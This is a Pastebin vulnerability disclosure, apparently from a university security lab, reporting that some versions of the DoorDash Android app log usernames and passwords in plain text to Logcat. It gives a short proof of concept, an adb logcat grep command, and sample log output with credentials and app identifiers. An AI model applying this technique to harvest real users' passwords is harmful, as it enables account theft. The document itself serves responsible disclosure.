SHARE
TWEET

Security Problem in DoorDash Android App

friendlyjlee Oct 7th, 2019 (edited) 425 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: DoorDash Android App - Username/Password Logging
  2. # Application: DoorDash
  3. # Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
  4. # Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
  5. # Company: DoorDash
  6. # Installs: 10,000,000+  (#1 in food category in Google Play)
  7. # Impact: Looking at the output of Logcat, hackers can get username and password of DoorDash
  8. # Category: Mobile Apps
  9. # Tested on: Android 9
  10.  
  11. ---Description---
  12. Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of DoorDash, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  13.  
  14. ---Vendor feedback---
  15. We have reported this issue, and they will fix it soon.
  16.  
  17. ---PoC---
  18. 1. Try to log in DoorDash Android app, Android app.
  19.   - Opening Login UI
  20.   - Enter credentials. Fake information is enough for reproducing.
  21.  
  22. 2. Search password in Logcat
  23. $ adb logcat | grep 'OkHttp'
  24.  
  25. 10-07 16:09:34.498 10066 10201 D OkHttp  : --> POST https://api.doordash.com/v2/auth/token/
  26. 10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Type: application/json; charset=UTF-8
  27. 10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Length: 109
  28. 10-07 16:09:34.498 10066 10201 D OkHttp  : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
  29. 10-07 16:09:34.498 10066 10201 D OkHttp  : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
  30. 10-07 16:09:34.498 10066 10201 D OkHttp  : --> END POST (109-byte body)
  31.  
  32.  
  33. ---Reporter---
  34. Jaeho Lee(Jaeho.Lee@rice.edu)
  35. Rice Computer Security Lab
  36. Rice University
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top